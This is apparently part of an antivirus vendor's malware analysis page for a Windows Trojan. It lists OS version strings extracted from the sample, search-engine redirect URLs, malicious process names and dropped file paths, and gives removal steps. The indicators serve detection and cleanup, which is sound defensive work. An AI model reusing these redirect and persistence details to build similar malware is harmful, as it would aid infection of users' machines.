6.00.2900.3640 (xpsp_sp2_qfe.091027-1402)
6.00.2900.3660 (xpsp_sp2_gdr.091216-1517)
6.00.2900.3660 (xpsp_sp2_qfe.091216-1705)
6.00.2900.3676 (xpsp_sp2_gdr.100225-1250)
6.00.2900.3676 (xpsp_sp2_qfe.100225-1434)
6.00.2900.3698 (xpsp_sp2_gdr.100416-1705)
6.00.2900.3698 (xpsp_sp2_qfe.100416-1708)
6.00.2900.5512 (xpsp.080413-2105)
6.00.2900.5583 (xpsp_sp3_gdr.080417-1430)
6.00.2900.5583 (xpsp_sp3_qfe.080417-1431)
6.00.2900.5626 (xpsp_sp3_gdr.080623-1315)
6.00.2900.5626 (xpsp_sp3_qfe.080623-1331)
6.00.2900.5659 (xpsp_sp3_gdr.080819-1237)
6.00.2900.5659 (xpsp_sp3_qfe.080819-1352)
6.00.2900.5694 (xpsp_sp3_gdr.081015-1312)
6.00.2900.5694 (xpsp_sp3_qfe.081015-1409)
6.00.2900.5764 (xpsp_sp3_gdr.090219-1240)
6.00.2900.5764 (xpsp_sp3_qfe.090219-1311)
6.00.2900.5803 (xpsp_sp3_gdr.090428-1325)
6.00.2900.5803 (xpsp_sp3_qfe.090428-1347)
6.00.2900.5835 (xpsp_sp3_gdr.090626-1535)
6.00.2900.5835 (xpsp_sp3_qfe.090626-1600)
6.00.2900.5880 (xpsp_sp3_gdr.090924-1438)
6.00.2900.5880 (xpsp_sp3_qfe.090924-1448)
6.00.2900.5897 (xpsp_sp3_gdr.091028-1650)
6.00.2900.5897 (xpsp_sp3_qfe.091028-1717)
6.00.2900.5921 (xpsp_sp3_gdr.091221-1718)
6.00.2900.5921 (xpsp_sp3_qfe.091221-1752)
6.00.2900.5945 (xpsp_sp3_gdr.100225-1251)
6.00.2900.5945 (xpsp_sp3_qfe.100225-1321)
6.00.2900.5969 (xpsp_sp3_gdr.100416-1716)
6.00.2900.5969 (xpsp_sp3_qfe.100416-1736)
6.00.2900.6003 (xpsp_sp3_gdr.100623-1635)
6.00.2900.6003 (xpsp_sp3_qfe.100623-1636)
6.00.2900.6036 (xpsp_sp3_gdr.100908-2023)
6.00.2900.6036 (xpsp_sp3_qfe.100908-2019)
6.00.2900.6049 (xpsp_sp3_gdr.101103-1638)
6.00.2900.6049 (xpsp_sp3_qfe.101103-1636)
6.00.2900.6058 (xpsp_sp3_gdr.101220-1709)
6.00.2900.6058 (xpsp_sp3_qfe.101220-1651)
6.00.2900.6082 (xpsp_sp3_gdr.110217-1622)
6.00.2900.6082 (xpsp_sp3_qfe.110217-1621)
6.00.2900.6104 (xpsp_sp3_gdr.110425-1624)
6.00.2900.6104 (xpsp_sp3_qfe.110425-1624)
6.00.2900.6126 (xpsp_sp3_gdr.110621-1627)
6.00.2900.6126 (xpsp_sp3_qfe.110621-1627)
6.00.2900.6148 (xpsp_sp3_gdr.110905-1615)
6.00.2900.6148 (xpsp_sp3_qfe.110905-1615)
6.00.2900.6168 (xpsp_sp3_gdr.111101-1829)
6.00.2900.6168 (xpsp_sp3_qfe.111101-1828)
6.00.2900.6182 (xpsp_sp3_gdr.111216-1642)
6.00.2900.6182 (xpsp_sp3_qfe.111216-1630)
6.00.2900.6197 (xpsp_sp3_gdr.120228-1720)
6.00.2900.6197 (xpsp_sp3_qfe.120228-1721)
6.00.2900.6228 (xpsp_sp3_gdr.120515-1618)
6.00.2900.6228 (xpsp_sp3_qfe.120515-1618)
6.00.2900.6254 (xpsp_sp3_gdr.120628-1618)
6.00.2900.6254 (xpsp_sp3_qfe.120628-1619)
6.00.2900.6287 (xpsp_sp3_gdr.120828-1631)
6.00.2900.6287 (xpsp_sp3_qfe.120828-1626)
6.00.2900.6309 (xpsp_sp3_gdr.121031-1323)
6.00.2900.6309 (xpsp_sp3_qfe.121031-1323)
6.00.2900.6357 (xpsp_sp3_gdr.130221-0418)
6.00.3790.0 (srv03_rtm.030324-2048)
6.00.3790.118 (srv03_gdr.031205-1652)
6.00.3790.118 (srv03_qfe.031205-1652)
6.00.3790.1830 (srv03_sp1_rtm.050324-1447)
6.00.3790.186 (srv03_gdr.040410-1234)
6.00.3790.186 (srv03_qfe.040410-1236)
6.00.3790.2509 (srv03_sp1_gdr.050815-1517)
6.00.3790.2653 (srv03_sp1_gdr.060303-1536)
6.00.3790.2653 (srv03_sp1_qfe.060303-1552)
6.00.3790.2732 (srv03_sp1_gdr.060623-0310)
6.00.3790.2732 (srv03_sp1_qfe.060623-0318)
6.00.3790.2817 (srv03_sp1_gdr.061023-0100)
6.00.3790.2993 (srv03_sp1_gdr.070817-1316)
6.00.3790.2993 (srv03_sp1_qfe.070817-1316)
6.00.3790.3041 (srv03_sp1_gdr.071107-1901)
6.00.3790.3041 (srv03_sp1_qfe.071107-1901)
6.00.3790.3091 (srv03_sp1_gdr.080215-1206)
6.00.3790.3091 (srv03_sp1_qfe.080215-1206)
6.00.3790.3194 (srv03_sp1_gdr.080819-1207)
6.00.3790.3194 (srv03_sp1_qfe.080819-1207)
6.00.3790.3229 (srv03_sp1_gdr.081016-1620)
6.00.3790.3229 (srv03_sp1_qfe.081016-1620)
6.00.3790.3304 (srv03_sp1_gdr.090303-1204)
6.00.3790.3304 (srv03_sp1_qfe.090303-1204)
6.00.3790.3959 (srv03_sp2_rtm.070216-1710)
6.00.3790.4186 (srv03_sp2_gdr.071108-1306)
6.00.3790.4186 (srv03_sp2_qfe.071108-1306)
6.00.3790.4210 (srv03_sp2_qfe.071221-1418)
6.00.3790.4237 (srv03_sp2_gdr.080215-1206)
6.00.3790.4237 (srv03_sp2_qfe.080215-1206)
6.00.3790.4275 (srv03_sp2_gdr.080417-1307)
6.00.3790.4275 (srv03_sp2_qfe.080417-1307)
6.00.3790.4324 (srv03_sp2_qfe.080630-1205)
6.00.3790.4357 (srv03_sp2_gdr.080819-1207)
6.00.3790.4357 (srv03_sp2_qfe.080819-1207)
6.00.3790.4392 (srv03_sp2_gdr.081016-1620)
6.00.3790.4392 (srv03_sp2_qfe.081016-1620)
6.00.3790.4470 (srv03_sp2_gdr.090303-1204)
6.00.3790.4470 (srv03_sp2_qfe.090303-1204)
6.00.3790.4504 (srv03_sp2_gdr.090428-1405)
6.00.3790.4504 (srv03_sp2_qfe.090428-1405)
6.00.3790.4539 (srv03_sp2_gdr.090626-1428)
6.00.3790.4539 (srv03_sp2_qfe.090626-1428)
6.00.3790.4589 (srv03_sp2_gdr.090914-1233)
6.00.3790.4589 (srv03_sp2_qfe.090914-1233)
6.00.3790.4672 (srv03_sp2_gdr.100225-1230)
6.00.3790.4672 (srv03_sp2_qfe.100225-1230)
6.00.3790.4696 (srv03_sp2_gdr.100419-1942)
6.00.3790.4732 (srv03_sp2_gdr.100623-0356)
6.00.3790.4732 (srv03_sp2_qfe.100623-0356)
6.00.3790.4772 (srv03_sp2_gdr.100908-1010)
6.00.3790.4772 (srv03_sp2_qfe.100908-1010)
6.00.3790.4795 (srv03_sp2_qfe.101103-0357)
6.00.3790.4807 (srv03_sp2_gdr.101220-0307)
6.00.3790.4807 (srv03_sp2_qfe.101220-0307)
6.00.3790.4835 (srv03_sp2_gdr.110222-0239)
6.00.3790.4835 (srv03_sp2_qfe.110222-0239)
6.00.3790.4857 (srv03_sp2_gdr.110425-0335)
6.00.3790.4857 (srv03_sp2_qfe.110425-0335)
6.00.3790.4879 (srv03_sp2_gdr.110621-0342)
6.00.3790.4879 (srv03_sp2_qfe.110621-0342)
6.00.3790.4904 (srv03_sp2_gdr.110905-0334)
6.00.3790.4904 (srv03_sp2_qfe.110905-0334)
6.00.3790.4929 (srv03_sp2_gdr.111104-0342)
6.00.3790.4929 (srv03_sp2_qfe.111104-0342)
6.00.3790.4944 (srv03_sp2_gdr.111216-0308)
6.00.3790.4944 (srv03_sp2_qfe.111216-0308)
6.00.3790.4969 (srv03_sp2_gdr.120228-0234)
6.00.3790.4969 (srv03_sp2_qfe.120228-0234)
6.00.3790.5004 (srv03_sp2_gdr.120515-0336)
6.00.3790.5004 (srv03_sp2_qfe.120515-0336)
6.00.3790.5029 (srv03_sp2_gdr.120628-0335)
6.00.3790.5029 (srv03_sp2_qfe.120628-0335)
6.00.3790.5060 (srv03_sp2_gdr.120824-0334)
6.00.3790.5060 (srv03_sp2_qfe.120824-0334)
6.00.3790.5080 (srv03_sp2_gdr.121026-1534)
6.00.3790.5080 (srv03_sp2_qfe.121026-1534)
HTTP/1.
HTTP/1.1 302 Moved Temporarily
http://www.baidu.com/s? tn=
http://www.baidu.com/
http://www.sogou.com/sogou? pid=
http://www.sogou.com/index. pid=
http://rlt.inte.sogou.com/




Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Scan a system with an anti-rootkit tool.
    2. 

  2. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    EXE_temp1.EXE:308
    shock.exe:3516
    taskkill.exe:1700
    EXE_temp4.EXE:1516
    ping.exe:1580
    ping.exe:1416
    svchots.exe:3760
    EXE_temp2.exe:1176
    huodongtongzhi.exe:1032
    netsh.exe:3916
    MiniIE.exe:3436
    qtool.exe:3460
    EXE_temp0.exe:980
    wpzir.exe:3300
    %original file name%.exe:1040
    

    3. 

  3. Delete the original Trojan file.
    4. 

  4. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\bt3742.bat (48 bytes)
    %WinDir%\JMt\sys32\shock_new.dat0 (54 bytes)
    %WinDir%\JMt\sys32\shock_new.dat1 (3 bytes)
    %WinDir%\JMt\sys32\shock.dll (845 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\bt5867.bat (55 bytes)
    %Program Files%\Common Files\Lkcjzquw.exe (3511647 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[1].css (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\b54815b87c96d562a1e3eb3a6f418[1].gif (1661 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].html (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\aaf38b09fdfe9c4d8687973dec764[1].gif (570 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[2].css (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\yuan[2].css (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\global1.3[1].css (1 bytes)
    %WinDir%\JMt\win32\DPro.sys (784 bytes)
    %WinDir%\JMt\win32\reTcp.sys (196 bytes)
    %WinDir%\JMt\win32\config.ini (46 bytes)
    %WinDir%\JMt\win32\rename.exe (5480 bytes)
    %Program Files%\Common Files\mdhc\dsau.exe (1702 bytes)
    %WinDir%\share\kbdf.dat (122 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~355ADAFA.ELOG (438554 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~7AB73D6F.TMP (52 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~09E7FCEE.TMP (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~2D915D30.TMP (50 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~4BB0A38B.TMP (98 bytes)
    %Documents and Settings%\%current user%\Desktop\Ê·ÉÏ×î¾¢±¬ÓÎÏ·.lnk (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~5454C00A.TMP (827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~0169CD4B.TMP (141 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\gjmxbvj.ico (388 bytes)
    %WinDir%\share\ico.dll (129 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\zeimroy.ico (388 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~7360087A.TMP (3835 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\RarLhr\acsvc.exe (3838 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ioergor.tmp (132 bytes)
    %System%\DqKgbb.dll (141 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~25C6BFA8.TMP (163 bytes)
    %Documents and Settings%\%current user%\Desktop\³ÉÈËÓÎÏ·.lnk (1 bytes)
    %WinDir%\share\rsvp\objs.exe (52 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\~72A678D6.TMP (146 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Sawrdxeyd.exe (1333 bytes)
    %WinDir%\JMt\wpzir.exe (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\iwvsbxk.txt (1281 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\itotzvy.txt (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\atxwrlr.txt (55 bytes)
    %WinDir%\JMt\sys32\whitelist.txt (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %WinDir%\JMt\win32\svchots.txt (70868 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uafuzsr.txt (2105 bytes)
    %WinDir%\JMt\sys32\shock.txt (18796 bytes)
    %WinDir%\JMt\sys32\whitelist.dat (2 bytes)
    %WinDir%\JMt\sys32\qtool.exe (155 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\efjtrit.txt (3 bytes)
    %WinDir%\JMt\First.txt (6988 bytes)
    %WinDir%\JMt\flist.bin (620 bytes)
    %WinDir%\JMt\sys32\shock.exe (111 bytes)
    %WinDir%\JMt\sys32\qtool.txt (26868 bytes)
    %System%\drivers\HideSys.sys (15 bytes)
    %WinDir%\JMt\win32\svchots.exe (1695 bytes)
    %WinDir%\JMt\MiniIE.txt (46228 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\sjapgfo.txt (3361 bytes)
    %WinDir%\JMt\MiniIE.exe (272 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp2.exe (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp1.EXE (673 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp4.EXE (2105 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\EXE_temp3.exe (673 bytes)
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now